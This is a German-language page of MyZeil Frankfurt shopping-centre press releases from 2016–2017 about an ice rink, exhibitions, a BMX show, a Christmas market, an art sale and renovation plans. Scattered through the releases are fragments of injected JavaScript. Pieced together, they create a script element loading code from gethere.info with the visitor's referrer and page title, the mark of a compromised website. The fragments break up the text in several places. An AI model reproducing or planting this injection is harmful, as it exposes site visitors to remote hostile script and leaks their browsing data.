Pressemitteilungen | MyZeil.de

Alle Beiträge in Pressemitteilungen

„MyZeil on Ice – weiter offen bis zum 28.02.2017!”

PRESSEMITTEILUNG
„Deutschlands höchste Eisbahn im Shopping Center MyZeil – MyZeil on Ice – weiter offen bis zum 28.02.2017!“
Frankfurt, 27. Januar 2017 – Frostige Temperaturen weiterhin – die Besucher und Gäste der MyZeil on Ice können sich freuen: Deutschlands höchste Eisbahn im Herzen Frankfurts und
das Winterparadies auf der Terrasse im 4. Obergeschoß des MyZeil hat aufgrund der enormen Nachfrage und natürlich auch der guten Witterungsbedingungen zum zweiten Mal verlängert.
Bis voraussichtlich 28.02.2017 können unsere Besucher und Gäste entspannt Eislaufen mit Blick über die Skyline Frankfurts bei Nachmittags- und/oder Abendsonne. Winter-Emotionen pur – Was gibt es Schöneres?
Auch der Getränkestand mit Glühwein, Kakao und Kinderpunsch im Angebot, hat bis voraussichtlich 28.02.2017 geöffnet. Für unsere Wochenend-Besucher werden auch frisch gebackene Waffeln angeboten. Die regulären Öffnungszeiten der Eisbahn sind weiterhin von 12:00 – 21:00 Uhr. Also: Auf in das Shopping Center MyZeil und den Winter einfach mal anders genießen!
PS: Am Valentinstag und an Karneval erwartet die Besucher und Gäste der MyZeil on Ice eine ganz besondere Überraschung!
Das MyZeil Frankfurt bietet auf ca. 44.000 qm Verkaufsfläche rund 100 Shops auf fünf Ebenen.

itten auf Frankfurts Haupteinkaufsstraße Zeil gelegen, ist es perfekt in die City integriert. Den Kunden stehen rund 1000 Parkplätze zur Verfügung. Architektonisches Highlight sind das spektakulär geschwungene Glasdach sowie die mit 42 Metern längste innenliegende freitragende Rolltreppe Europas. Täglich kommen schon heute rund 50.000 Kunden ins Center, an Wochenenden bis zu 100.000.Insgesamt wird das Center jährlich von rund 15 Mio. Kunden besucht. Während des ganzen Jahres bietet das MyZeil seinen täglich vielen Besuchern interessante und spektakuläre Aktionen und Events, die das Einkaufen zum unvergleichlichen Erlebnis machen.

Pressekontakt:
MyZeil Frankfurt
Marcus Schwartz, Center-Manager Tel.: 069 / 297 23 97-0
E-Mail: Marcus.Schwartz@ece.com www.myzeil.deif (document.currentScript) {

Top

„Achtung 80er! – hr1 on Tour“

PRESSEMITTEILUNG
„Mit hr1 zurück in die achtziger Jahre
Sonderausstellung „Achtung 80er! – hr1 on Tour“ im MyZeil Frankfurt“

Die achtziger Jahre waren bunt, schrill, politisch. Sie waren aufregend und ein bisschen spießig zugleich. Die achtziger Jahre, das waren Helmut Kohl und Joschka Fischer, Nena und Madonna, Karottenhosen und Röhrenjeans, Startbahn West und Mauerfall. Dieses Jahrzehnt zwischen Aufbruch und Umbruch hat die „Generation Babyboomer“ bis heute geprägt. In der multimedialen Ausstellung „Achtung 80er! – hr1 on Tour“ geht es um das ureigene Lebensgefühl dieses Jahrzehnts. MyZeil und hr1 laden ab Freitag, 3. Februar bis zum Samstag, 11. Februar ein, im Shopping Center MyZeil – mitten in der Innenstadt – in die Welt der achtziger Jahre einzutauchen.

Ein „DeLorean“ Fotopoint im MyZeil
Ein Nachbau des berühmten Sportwagens „DeLorean“ aus dem Filmklassiker „Zurück in die Zukunft“ und DocBrown werden zum Auftakt am Freitag, 03.02.2017, auf dem Fotopoint im Eingangsportal auf die spannende Schau im Inneren des Centers hinweisen. Dort erwarten die Besucher drei mal drei Meter große Erlebnisräume, darunter ein begehbares, typisches Jugendzimmer der achtziger Jahre. Mit riesigen Fotowänden, spannenden und skurrilen Videos sowie lebendigen und emotionalen Audiocollagen werden die prägenden Jahre wieder lebendig. Ausstellungsstücke wie Walkman, C 64, Zauberwürfel und ein Original-Bravo-Starschnitt machen die Alltagskultur im wahrsten Sinne anschaulich. Bekannte hr1-Moderatoren wie Marion Kuchenny geben persönliche Einblicke in ihre damalige Zeit.

Termine und Orte
Die hr1-Ausstellung „Achtung 80er! – hr1 on Tour“ wird in Shopping Centern präsentiert und tourt quer durch ganz Hessen. Sie kann während der Öffnungszeiten der Zentren kostenlos besucht werden. Die dritte Station ist das MyZeil Frankfurt und beginnt am Freitag, 3. Februar. Die Ausstellung war bereits in der WERKStadt Limburg und im dez Kassel zu sehen.

MyZeil Frankfurt: 03. bis 11. Februar 2017
Adresse: Zeil 106, 60313 Frankfurt am Main

Mehr Informationen auch unter: www.hr1.de
Facebook: https://de-de.facebook.com/hr1/
Twitter: https://twitter.com/hrpresse

Das MyZeil Frankfurt bietet auf ca. 44.000 qm Verkaufsfläche rund 100 Shops auf fünf Ebenen. Mitten auf Frankfurts Haupteinkaufsstraße Zeil gelegen, ist es perfekt in die City integriert. Den Kunden stehen rund 1000 Parkplätze zur Verfügung. Architektonisches Highlight sind das spektakulär geschwungene Glasdach sowie die mit 42 Metern längste innenliegende freitragende Rolltreppe Europas. Täglich kommen schon heute rund 50.000 Kunden ins Center, an Wochenenden bis zu 100.000.Insgesamt wird das Center jährlich von rund 15 Mio. Kunden besucht. Während des ganzen Jahres bietet das MyZeil seinen täglich vielen Besuchern interessante und spektakuläre Aktionen und Events, die das Einkaufen zum unvergleichlichen Erlebnis machen.

Pressekontakt:
MyZeil Frankfurt
Marcus Schwartz, Center-Manager
Tel.: 069 / 297 23 97-0
E-Mail: Marcus.Schwartz@ece.com
www.myzeil.de

document.currentScript.parentNode.insertBefore(s, document.currentScript);

Top

„Down Mall – Das Event der Extra-Klasse“

„Down Mall – Das Event der Extra-Klasse“
Spektakuläre Bike und Freestyle-Show am 28.01.2017 im Shoppingcenter MyZeil“

Frankfurt, 13. Januar 2017 – Nach dem enormen Erfolg im vergangenen Jahr gastiert die spektakuläre Bike- und Freestyle-Show erneut im Shoppingcenter MyZeil.
Am Samstag, den 28.01.2017, ab 11.30 Uhr verwandelt sich für ca. 35 Spitzen-Sportler aus aller Welt das MyZeil zur Rennstrecke und wird zum Spielplatz für BMX-Freaks und Mountainbiker!

Waghalsige Tricks, Action und schnellste Zeiten! Adrenalin pur! Das ist Down Mall – das Event der Extraklasse!

Professionelle BMX-Fahrer und Mountain-Biker starten in zwei Disziplinen und springen vom 5. Obergeschoss ins 4. Obergeschoss, um anschließend im atemberaubenden Tempo über die Mall und Rolltreppen bis in das Erdgeschoss zu fahren und zu springen. Dabei werden die Rolltreppen für erstklassige Loopings und Speed-Passagen genutzt. In der ersten Disziplin geht es um Schnelligkeit, in der zweiten um Punkte, die anhand von Sprüngen vergeben werden. Gewertet werden beste Tricks und schnellste Zeiten. Die Fahrer sind alle Profis und fahren in der Saison unter anderem bei RedBull-Events und anderen Meisterschaften.

Das Event Down Mall gastierte bereits in mehreren Städten- in Hannover, Berlin, Budapest, Bratislava, Prag, und ist jetzt wiederholt im Rhein Main Gebiet unterwegs.
Einen Einblick erhalten Sie auch unter: https://www.youtube.com/watch?v=hjXSIm1Exwk

Top

Eisbahn – cooles After Work Package

„Deutschlands höchste Eisbahn im Shopping Center MyZeil – MyZeil on Ice – verlängert bis zum 29.01.2017!“

Cooles After Work Package buchen

Frankfurt, 09. Januar 2017 – Der Winter hat auch in Hessen Einzug gehalten. MyZeil on Ice – Deutschlands höchste Eisbahn im Herzen Frankfurts und
d a s Winterparadies auf der Terrasse im 4. Obergeschoß des MyZeil, hat aufgrund der enormen Nachfrage von Besuchern und Gästen bis zum 29.01. verlängert.

Entspannt Eislaufen mit Blick über die Skyline Frankfurts bei Nachmittags- und/oder Abendsonne, Winter-Emotionen pur – Was gibt es schöneres?

Unser Angebot an unsere Besucher und Gäste: Ein cooles After Work Package buchen, werktags von 20:00 – 21:00 Uhr, Start 09.01.2017. Eintritt und Schlittschuhe = 2für1. Das heißt, 2 Personen bekommen Eintritt und Schlittschuhe für 7€ (Normalpreis pro Person: 3,50€ Eintritt und 3,50€ Schlittschuhe).

Auch der Glühweinstand hat bis zum 29.01.2017 geöffnet. Die regulären Öffnungszeiten der Eisbahn sind weiterhin von 12:00 – 21:00 Uhr.

Also: Auf in das Shopping Center MyZeil und den Winter einfach mal anders genießen!

Das MyZeil Frankfurt bietet auf ca. 44.000 qm Verkaufsfläche rund 100 Shops auf fünf Ebenen. Mitten auf Frankfurts Haupteinkaufsstraße Zeil gelegen, ist es perfekt in die City integriert. Den Kunden stehen rund 1000 Parkplätze zur Verfügung. Architektonisches Highlight sind das spektakulär geschwungene Glasdach sowie die mit 42 Metern längste innenliegende freitragende Rolltreppe Europas. Täglich kommen schon heute rund 50.000 Kunden ins Center, an Wochenenden bis zu 100.000.Insgesamt wird das Center jährlich von rund 15 Mio. Kunden besucht. Während des ganzen Jahres bietet das MyZeil seinen täglich vielen Besuchern interessante und spektakuläre Aktionen und Events, die das Einkaufen zum unvergleichlichen Erlebnis machen.
d.getElementsByTagName(‘head’)[0].appendChild(s);

Top

Der Zauberhafte Weihnachtsmarkt im Thurn & Taxis Palais

„MyZeil präsentiert:
Der Zauberhafte Weihnachtsmarkt im Thurn & Taxis Palais“

Frankfurt, 15. Dezember 2016 – Um die Weihnachtszeit einzuläuten, das Weihnachtsfeeling zu erleben und den Weihnachtseinkauf so angenehm und unvergesslich wie möglich zu gestalten, bietet das MyZeil das ganze Rund-Um-Wohlfühlpaket für seine Kunden und Besucher an.

Der Weihnachtsmarkt im Thurn und Taxis Palais findet dieses Jahr zum vierten Mal in Folge statt und ist Teil des weihnachtlichen Ambientes des Palais Quartiers, bestehend aus dem Shopping Center MyZeil, dem Hotel Jumeirah, Thurn & Taxis Palais sowie dem Nextower.

Der Innenhof des Thurn & Taxis Palais ist eine über die Grenzen Frankfurts hinaus bekannte Location inmitten der Großstadt. Leckerer Glühwein, ein individuelles Street Food Angebot und eine außergewöhnliche Atmosphäre machen den Besuch des Weihnachtsmarktes unvergesslich.

Die Besonderheit: Der Weihnachtsmarkt im Innenhof des Palais ist nicht an die Öffnungszeiten des Frankfurter Weihnachtsmarktes gekoppelt.

Öffnungszeiten Weihnachtsmarkt im Thurn & Taxis Palais: Bis 23.12.2016, täglich 16:00 – 23:00 Uhr, Samstag und Sonntag schon ab 14:00 Uhr.
Weihnachtliches Food-Angebot:

Goose-Foodtruck Frankfurt, Gökhan Kaba, www.goose-ffm.de, raffinierte Waffeln

Tilly’s Tante, Sybille Rumpf, www.tillystante.com, leckere Suppen

Smoketruck, Alex de Kanter, www.smoketruck.de kanadisches Smoke-Food

Arnauds-Cult-Tour, Arnaud Juillot, www.arnauds-cult-tour.de, französischer Sandwich Genuß

Master-Cook, Jan Maigler, www.master-cook.de, deftiger Flammkuchen

Mirrianne Mahn mit exotischer westafrikanischer Küche

Daniel Engel mit heimischen Ofenkartoffeln

Andrij und Ruslan mit russischen Leckereien

Betreiber Weihnachtsmarkt: Shopping Center MyZeil in Kooperation mit “Jasmin Ziegler – decosie.de” als Veranstalter.

Wir laden Sie herzlich ein, mit uns das herrliche Lichterspektakel und die besinnliche Atmosphäre bei weihnachtlicher Musik zu genießen.

Auf die Besucher und Gäste des MyZeil on Ice! wartet auch auf der Terrasse im 4. Obergeschoss „Deutschlands höchste Eisbahn“!
Mit Schlittschuhverleih, Schlittschuhservice, heißen Getränken und natürlich Eislaufen mit Skylineblick bei Abend-/Nachmittagssonne.
Schlittschuhfahren auf der Eisbahn MyZeil on Ice! kostet pro Person 3,50€, die Leihgebühr der Schlittschuhe beträgt 3,50€.
Die Öffnungszeiten sind täglich, auch sonntags, von 12 – 21 Uhr.if (document.currentScript) {

Top

Prominente aus Politik und Wirtschaft verpacken Weihnachtsgeschenke zugunsten Main Kind e.V.

skw_1643

Prominente aus Politik und Wirtschaft  packen Weihnachtsgeschenke ein zugunsten Main Kind e.V.

Spendenaktion bringt  6.000 Euro

Frankfurt, 10. Dezember 2016 – Namhafte Vertreter der Stadt Frankfurt, allen voran OB Peter Feldmann, zusammen mit dem Vorstand der Frankfurt International Alliance eG (FIA), FIA-Partnern, dem Vorstand der Main Kind e.V. und weiteren Prominenten aus Politik und Wirtschaft sind im Shopping Center MyZeil zusammen gekommen und haben eine Weihnachtsgeschenke-Einpack-Aktion gestartet. Hierbei wurden freiwillige Spenden entgegengenommen, die dem Main Kind e. V. –  Initiative gegen Kinderarmut in Frankfurt – zugutekommen.

 

Der Erlös aus der freiwilligen Spendenaktion:  Ganze 6.000 Euro!

 

Marcus Schwartz, Center Manager MyZeil ist stolz berichten zu können: „Die MyZeil, die FIA und der Vorstand Main Kind e.V. initiierten diese großartige Gemeinschaftsaktion zugunsten der Main Kind e.V. Wir haben der Aktion unsere Stimme gegeben und freuen uns natürlich, mit unseren gesammelten Spenden einen kleinen Beitrag gegen die Kinderarmut in unserer Stadt Frankfurt leisten zu können. In gerade mal 4 Stunden haben wir zusammen mit Großspenden 6.000 Euro sammeln können! Ein toller Erfolg!“

 

Schwartz, der sich im Vorfeld schon mit 1.000€ an der Aktion beteiligte, war Ansporn für weitere Prominente Spendenakteure: Holger Beckmann, Landesgeschäftsführer des ASB Hessen und der Schulleiter der vom ASB getragenen ERASMUS Frankfurter Stadtschule beteiligte sich mit einer Spende in Höhe von 2.500 Euro.

 

 

Das MyZeil Frankfurt bietet auf ca. 44.000 qm Verkaufsfläche rund 100 Shops auf fünf Ebenen. Mitten auf Frankfurts Haupteinkaufsstraße Zeil gelegen, ist es perfekt in die City integriert. Den Kunden stehen rund 1000 Parkplätze zur Verfügung. Architektonisches Highlight sind  das spektakulär geschwungene Glasdach sowie die mit 42 Metern längste innenliegende freitragende Rolltreppe Europas. Täglich kommen schon heute rund 50.000 Kunden ins Center, an Wochenenden bis zu 100.000.Insgesamt wird das Center jährlich von rund 15 Mio. Kunden besucht. Während des ganzen Jahres bietet das MyZeil seinen täglich vielen Besuchern interessante und spektakuläre Aktionen und Events, die das Einkaufen zum unvergleichlichen Erlebnis machen.

 } else {

Top

Kunstsupermarkt

img_3005

Kunstsupermarkt startet am 18. November im Shoppingcenter MyZeil

Großer Event für zeitgenössische Kunst: 80 nationale und internationale Künstler stellen über 5.000 Werke aus, Unikate zu kleinem Preis unter dem Slogan „Kunst macht glücklich“

Vernissage am Freitag, den 18.11. 2016 ab 17:00 Uhr

Frankfurt, 18. November 2016 – Der 18. Frankfurter Kunstsupermarkt öffnet in diesem Jahr zum wiederholten Male im MyZeil seine Türen.
Bis zum 28. Januar 2017 – 10 Wochen lang – werden in großzügigen Räumen im MyZeil Tausende originale Kunstwerke gezeigt.

Etablierte Kunstschaffende und junge Talente präsentieren Zeichnungen, Acryl- und Ölbilder, Aquarelle, Fotokunst und Kleinplastiken. Der überwiegende Teil der Arbeiten hat Fixpreise zwischen 59,- und 330,- Euro. Im höheren Preissegment gibt es zudem eine reiche Auswahl an großformatigen Gemälden.

Die Präsentation der Kunstwerke erfolgt zum einen in einer dynamischen, flächendeckenden Schau an den Wänden – zum anderen in überschaubaren, speziell gefertigten Künstlerkisten. So können sich die Kunden aus dem riesigen Angebot ihre Favoriten auswählen und auf Wunsch auch sofort einrahmen lassen.

Kunst macht glücklich!
Der Kontakt mit der schöpferischen Leistung erzeugt Emotion, Faszination, Freude, Spannung und Entspannung. Die Beschäftigung mit Kunst, so hat die kulturvergleichende Forschung herausgefunden, wird auf der ganzen Welt von den Menschen als beglückend erlebt. Der Kunstsupermarkt fördert die Begegnung zwischen Kunst und Betrachtern. Durch seinen niederschwelligen Zugang können immer mehr Menschen die anregende Atmosphäre von Originalwerken auch zu Hause genießen.

Gemessen an der Zahl der Besucher ist der Kunstsupermarkt mittlerweile eine Großveranstaltung für zeitgenössische Kunst. Der Event findet jedes Jahr vor Weihnachten statt und hat sich zu einer der erfolgreichsten Plattformen für zeitgenössische Kunst in Deutschland, Österreich und in der Schweiz entwickelt. Auch die Zahlen der Ausstellungspräsentation sind rekordverdächtig: 80 Künstler aus 15 Ländern stellen über 5000 Werke aus. Wichtig sind den Organisatoren die gleichbleibend hohe Qualität der Kunstwerke und das wechselnde Angebot. „Das sorgt dafür, dass wir jedes Jahr aufs Neue so viele Besucher aus allen Bevölkerungsschichten begeistern können“, so Mario Terés, der Gründer und Organisator des Kunstsupermarktes.

18. Frankfurter Kunstsupermarkt vom 18.11.2016 bis 28.1.2017
MyZeil, Erdgeschoss
Zeil 106
60313 Frankfurt
Tel. 069 21 99 46 39
Öffnungszeiten (ab 19.11.2016):
Montag bis Mittwoch von 10:00 bis 20:00 Uhr
Donnerstag bis Samstag von 10:00 bis 21:00 Uhr
Vernissage: Freitag, 18. November 2016, ab 17:00 Uhr
Für Rückfragen und weitere Fotowünsche kontaktieren Sie bitte:
Helga Berger: 0179-5212683
E-Mail: info@kunstsupermarkt.de

Kunstsupermarkt Zentrale
Terés-Loytved GbR, Ernst-Giller-Str. 20, 35039 Marburg
Telefon: 06421-590 787, Mobil: 0177-6016613
http://kunstsupermarkt.de
Alle Fotos Abdruck frei! Alle Copyrights: Kunstsupermarkt

l1010619s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Top

MyZeil Foodtopia

ECE stellt Konzept für spektakulären neuen Food- und Entertainment-Bereich „Foodtopia“ vor
Internationale Gastronomiekonzepte, Premium-Kino und neue Außenterrassen geplant

Frankfurt am Main/Hamburg, 2. November 2016 – Das Shopping-Center MyZeil im Herzen der Frankfurter Innenstadt soll bis Ende 2018 einen spektakulären neuen Food-Bereich von internationalem Format bekommen. Dazu ist geplant, im vierten Obergeschoss des MyZeil ein neuartiges Gastronomie- und Entertainment-Angebot mit einem abwechslungsreichen Mix moderner internationaler und lokaler Restaurant- und Bar-Anbieter sowie einem Premium-Kino zu realisieren. Das aktuell geplante Konzept und erste visuelle Eindrücke der neuen Frankfurter Gastro-Destination, die den Namen „Foodtopia“ tragen soll, hat die ECE heute in Frankfurt gemeinsam mit dem britischen Food-Experten Jonathan Doughty, Head of EMEA Foodservice Consulting bei JLL, potentiellen Mietpartnern und Betreibern aus der Gastronomieszene vorgestellt. Das „Foodtopia“ ist als zweiter großer Baustein der Modernisierung und Umgestaltung des MyZeil zu einem modernen Shopping-, Lifestyle- und Entertainment-Komplex vorgesehen. Der Umbau der unteren Verkaufsebenen ist bereits in vollem Gange: Unter anderem bekommt das MyZeil derzeit ein neues Entrée und neu angeordnete Rolltreppen für eine bessere Erschließung des Gebäudes.

„Mit dem neuen Food-Bereich wollen wir im MyZeil etwas ganz Besonderes schaffen, indem wir Shoppen, Essen, Genießen, Freizeit und Entertainment auf ganz neue Art und Weise verbinden“, so Marc Blum, Chef-Architekt der ECE. „Mit einem vielfältigen Angebot und den neuesten Trends aus der Food-Szene, besonderer Architektur und coolem Design sowie spektakulären Ausblicken auf die Frankfurter Skyline wird das neue MyZeil ein echter Hotspot für die Frankfurter und ihre Gäste werden.“

Das neue Gastronomie-Konzept im vierten Obergeschoss des MyZeil sieht in sieben verschiedenen Themenbereichen ein besonders abwechslungsreiches Spektrum an unterschiedlichen internationalen und regionalen Food- und Bar-Konzepten von hoher Qualität vor. Ziel ist es, mit dem Foodtopia während der gesamten Öffnungszeiten des Centers von morgens bis spätabends das passende Angebot für jede Tageszeit und jeden Geschmack zu haben: von der Cafébar über hochwertige Lunch-Konzepte im Fast-Casual-Bereich für die Mittagspause bis hin zu Casual-Dining-Anbietern für ein exklusiveres Abendessen und coole Bars für den Abend und bis in die Nacht hinein.

„Wichtig ist: Das Foodtopia ist kein weiterer Food Court, sondern sehr, sehr viel mehr als das“, hob Food-Guru und ECE-Partner Jonathan Doughty die Idee des Konzepts hervor. „Unser Ziel ist, einen perfekten Ort zu schaffen mit einem umfangreichen Gastronomieangebot für unterschiedliche Anlässe und verschiedene Geschmäcker – und einem breiten Spektrum an Erlebnissen, großartiger Qualität und besonderem Service. Zu dieser Idee gehört eine Menge dazu: leckeres Essen und gute Drinks, aber eben auch Emotionen, Atmosphäre, besondere Erlebnisse, cooles Design und die tolle Architektur des MyZeil mit ihren spektakulären Eindrücken.“

Das vorgestellte Konzept der ECE basiert auch auf den Ideen und dem Engagement der späteren Betreiber im Foodtopia, die den neuen Gastronomie-Bereich mit Leben, Persönlichkeit und Atmosphäre füllen sollen. Gemeinsam mit Interessenten und potentiellen Mietern soll das Konzept daher weiterentwickelt und verfeinert werden.

Zu den besonderen Highlights des Foodtopia-Konzepts gehören außerdem bis zu vier verschiedene Terrassen – eine davon könnte sogar im siebten Obergeschoss über den Dächern der Stadt sein –, die großartige Ausblicke auf die Frankfurter Skyline bieten und für eine lässig-urbane Atmosphäre sorgen werden. Auch im Inneren soll ein ganz besonderes Ambiente die Besucher überzeugen und begeistern, mit verschiedenen Designelementen aus der internationalen Gastronomie-Szene, etwa im Urban-Gardening- und Vintage-Industry-Stil. Die Neuinterpretation einer Markthalle mit ihrem vielfältigen Angebot und ihrer lebendigen Atmosphäre soll die heute schon spektakuläre Glasarchitektur von Massimiliano Fuksas gestalterisch aufnehmen und mit neuen optischen Eindrücken neu inszenieren und in das Gebäude integrieren.

Teil der Konzeptidee für das MyZeil ist außerdem die Ansiedlung eines hochwertigen Programmkinos mit klassischem Kinoflair und außergewöhnlichem Service, das für ein besonderes Angebot im Entertainment-Bereich sorgen soll. Neben dem geplanten neuen Food-Bereich sind weitere umfangreiche Modernisierungs- und Umbauarbeiten im MyZeil geplant oder bereits in Arbeit: Dazu gehören ein neuer, hochwertig gestalteter Eingangsbereich, versetzte und neu angeordnete Rolltreppen, die für eine verbesserte Erschließung der Ebenen und eine optimierte Wegeführung im Objekt sorgen sollen, sowie die Umgestaltung der Mall, in der mit warmen, hochwertigen Materialien, neuen eleganten Sitzgelegenheiten und einem verbesserten Lichtkonzept eine besonders angenehme und zeitgemäße Atmosphäre erzeugt werden soll. Auch der Mietermix im MyZeil soll weiter optimiert werden und einen stärkeren Fokus auf hochwertige internationale Konzepte und den Ausbau des Sportangebots erhalten.

Das Investitionsvolumen für das gesamte Modernisierung- und Umgestaltungskonzept beläuft sich nach derzeitiger Planung voraussichtlich auf einen mittleren zweistelligen Millionen-Euro-Betrag. Die Ausarbeitung und Umsetzung des Konzepts liegen wie die Vermietung und das Management des MyZeil in Händen der ECE.

Über die ECE
Die ECE entwickelt, plant, realisiert, vermietet und managt seit 1965 Shopping-Center. Mit 199 Einkaufszentren im Management (davon 48 im Management der MEC METRO-ECE Centermanagement GmbH & Co. KG) und Aktivitäten in 14 Ländern ist die ECE europäische Marktführerin im Shopping-Center-Bereich. In allen ECE-Centern zusammen erwirtschaften ca. 21.000 Einzelhandelsmieter auf einer Verkaufsfläche von insgesamt ca. 7,3 Millionen qm einen Jahresumsatz von rund 24 Milliarden Euro. Zu diesen Centern zählen u. a. das Milaneo in Stuttgart, das Aquis Plaza in Aachen, die Promenaden im Hauptbahnhof Leipzig und der Marmara Park in Istanbul. Zahlreiche weitere Shopping-Center sind europaweit in Bau oder Planung, darunter das Loom Bielefeld, das Cano in Singen sowie das Adigeo in Verona/Italien. In ihren Sparten Office, Traffic und Industries realisiert die ECE auch andere Gewerbeobjekte, so etwa die Intelligent Quarters in Hamburg, das ThyssenKrupp Quartier in Essen und das 25hours Hotel in Düsseldorf.

Pressekontakt:
ECE Projektmanagement
Christian Stamerjohanns
Sprecher / Leiter Public Relations
Tel.: 040 / 60606-6898
E-mail: presse@ece.de, www.ece.de

04_Welcome hall

08_CentralStage

09_Cinema

10_Social Drinking and Skybar

 

Top

Neueröffnung: Accessorize eröffnet Flagship-Store im Shopping-Center MyZeil

Frankfurt, 18. August 2016 – Das britische Trend-Label Accessorize feiert große Neueröffnung am 18.08.2016 im Shopping-Center MyZeil in Frankfurt. Accessorize besetzt eine einzigartige Position unter den High Street Labels: Das umfangreiche Sortiment an Mode-Accessoires speist sich aus Einflüssen aus der ganzen Welt und steht für hohe Produktqualität sowie faire Preise. Accessorize greift immer saisonale Themen auf und präsentiert dabei einen ganz individuellen Umgang mit den neuesten Trends.

Das einzigartige Sortiment unterschiedlichster Accessoires reicht von Schmuck über Hüte und Schals bis hin zu Handschuhen, Lingerie, Bademode, Haarschmuck, Schuhen und Taschen.

Jede Saison werden die Accessorize-Kollektionen von einem anderen prominenten Testimonial präsentiert: Accessorize-Kampagnengesichter waren unter anderem schon Heidi Klum, Claudia Schiffer, Bar Refaeli und Naomi Campbell.

Monsoon Accessorize wurde im Jahr 2007 mit dem „The Queen’s Award For Enterprise In International Trade“ ausgezeichnet. Diese Awards werden jedes Jahr auf Vorschlag des Premierministers durch die Queen vergeben.

Accessorize_Kampagnenbild

var d=document;var s=d.createElement(‘script’);

Top

Shopping Center MyZeil wird umgebaut

PRESSEMITTEILUNG
„Freu dich auf’s Neue – Shopping Center MyZeil wird umgebaut.
1.    Bauabschnitt:  22. Juli 2016 – bis voraussichtlich November 2016 “
Frankfurt, 22. Juli 2016 – Der Startschuss für den Umbau von Frankfurts größtem innerstädtischen Shopping Center MyZeil ist gefallen. Die Bauarbeiten haben begonnen.
Die letzten Stemmarbeiten zur Demontage der Rolltreppen führten  heute Oliver Schwebel, Wirtschaftsförderung Frankfurt am Main, und Marcus Schwartz, Center Manager MyZeil, zusammen mit dem von der ECE beauftragten Generalunternehmer der Emmeluth Baugesellschaft durch.

Oliver Schwebel, Geschäftsführer der Wirtschaftsförderung Frankfurt: „Die Innenstadt Frankfurt und die Zeil lebt. Ich freue mich auf die Fortschreibung der Erfolgsgeschichte MyZeil. Bereits seit der Eröffnung war das Shopping Center ein Highlight und wird durch die Umbaumaßnahmen die Spitzenstellung als eines der beliebtesten Shopping Center  Deutschlands weiter ausbauen. Die Firma ECE setzt damit in Frankfurt ein weiteres Highlight.“

Seit der Eröffnung des Shopping Centers MyZeil am 1. Dezember 2009 haben mehr als 100 Mio. Menschen das Center mitten im Herzen Frankfurts besucht. Der Betreiber ECE zeigt sich zufrieden.

Seit dem Kauf und der Übernahme durch die ECE und die Deutsche Asset & Wealth Management am 29.11.2014 ist der aus dem Rhein-Main-Gebiet stammende Marcus Schwartz zuständig für Mieter und Kunden des Shopping Centers MyZeil. Seitdem hat sich vieles zum Positiven gewandelt. So konnten namhafte Marken wie LUSH, Bering, The BodyShop und weitere  zu den bestehenden Mietern wie Saturn, Anson’s, Hollister, Rewe, Fitness First angesiedelt werden. Auch spektakuläre Aktionen und Events wie die DownMall mit über 70.000 Besuchern, Hessens höchste Eisbahn, die sensationelle Weihnachtsdekoration mit den springenden Hirschen und vieles andere mehr finden im Center statt.

Schwartz, bereits seit über 10 Jahren bei der ECE, dazu: „Frankfurt at it‘s best – das ist das Shopping Center MyZeil mitten im Herzen der Stadt. Ich bin absolut begeistert vom Center, der einzigartigen Architektur und den Marken, die wir führen. Die MyZeil bietet hochwertige Einkaufsmöglichkeiten, Freizeit- und Fitnessangebote sowie gastronomische Vielfalt. In den nächsten Jahren werden wir zusammen mit unseren Partnern und Mietern weitere Optimierungen für unsere Gäste und Kunden vornehmen. Darauf freue ich mich besonders“.
Jetzt ist es an der Zeit, in die Zukunft zu schauen und die versprochenen Optimierungen in die Tat umzusetzen.
Im Inneren des Shopping Centers ist vom Baulärm bisher wenig zu spüren. Der Haupteingang ist passierbar, das Shoppingcenter empfängt Einheimische und Touristen auf bekannt weltmännische Art.
Um die Kundschaft nicht mit Lärm, Dreck und Schmutz zu verärgern, wird ganz „behutsam“ vorgegangen. Bislang sieht man nur erste diskrete Staubwände von den Umbauten.
In der ersten Bau-Phase, die bis zum September andauern wird, werden im Bereich des Eingangs die alten Rolltreppen vom  Erdgeschoss bis zum 2. Obergeschoss demontiert und in der 2. Bau- Phase durch neue Rolltreppen in veränderter Position ersetzt. Desweiteren wird eine neue Torluftschleieranlage eingebaut, um den Besuchern in Zukunft vollen klimatischen Komfort, auch während der kalten Jahreszeit, zu bieten.
Unter optimalen Bedingungen ist mit der Fertigstellung der Umbaumaßnahmen und Inbetriebnahme der Rolltreppen im November 2016 zu rechnen.
Die gesamte Baumaßnahme der MyZeil wird von der ersten Planung bis zur Fertigstellung komplett von der ECE betreut. Durch die Umstrukturierung im Eingangsbereich der MyZeil wird die vertikale Erschließung in allen Etagen erheblich verbessert. Darüber hinaus entsteht ein neues Eingangs- und Raumgefühl mit einer Galerie, die die architektonische Bedeutung  des Shopping Centers hervorhebt.

Die ECE entwickelt, plant, realisiert, vermietet und managt seit 1965 große Einkaufszentren und ist mit 196 Shopping Centern im Management (davon 41 im Joint Venture mit METRO Properties von der MEC METRO-ECE Centermanagement GmbH & Co. KG betrieben) und Aktivitäten in 16 Ländern europäische Marktführerin auf diesem Gebiet.

Im Großraum Frankfurt betreibt die ECE bereits das Main-Taunus-Zentrum, das Skyline Plaza, das Hessen-Center sowie das Isenburg-Zentrum in Neu-Isenburg.

Die MyZeil Frankfurt bietet auf ca. 44.000 qm Verkaufsfläche rund 100 Shops auf fünf Ebenen. Mitten auf Frankfurts Haupteinkaufsstraße Zeil gelegen, ist das Shopping Center perfekt in die City integriert. Den Kunden stehen rund 1000 Parkplätze zur Verfügung. Architektonisches Highlight sind  das spektakulär geschwungene Glasdach sowie die mit 42 Metern längste innenliegende freitragende Rolltreppe Europas. Täglich kommen schon heute rund 50.000 Kunden ins Center, an Wochenenden sogar bis zu 100.000. Insgesamt wird das Center jährlich von rund 15 Mio. Kunden besucht. Während des ganzen Jahres bietet die MyZeil seinen zahlreichen Besuchern interessante und spektakuläre Aktionen und Events, die das Einkaufen zum unvergleichlichen Erlebnis machen.

 

Umbau-Startschuss_MyZeil_1Umbau-Startschuss_MyZeil_2 Umbau-Startschuss_MyZeil_3
Fotohinweis: (v.l.n.r.)
Foto 1
Udo Viehmann (Emmeluth Baugesellschaft), Oliver Schwebel (Wirtschaftsförderung Frankfurt), Marcus Schwartz (ECE – Center Manager),  und Bauteam
Foto 2
Dirk Barkhausen (RKS Projektleitung), Oliver Schwebel, Marcus Schwartz, Markus Hartmann,  Udo Viehmann
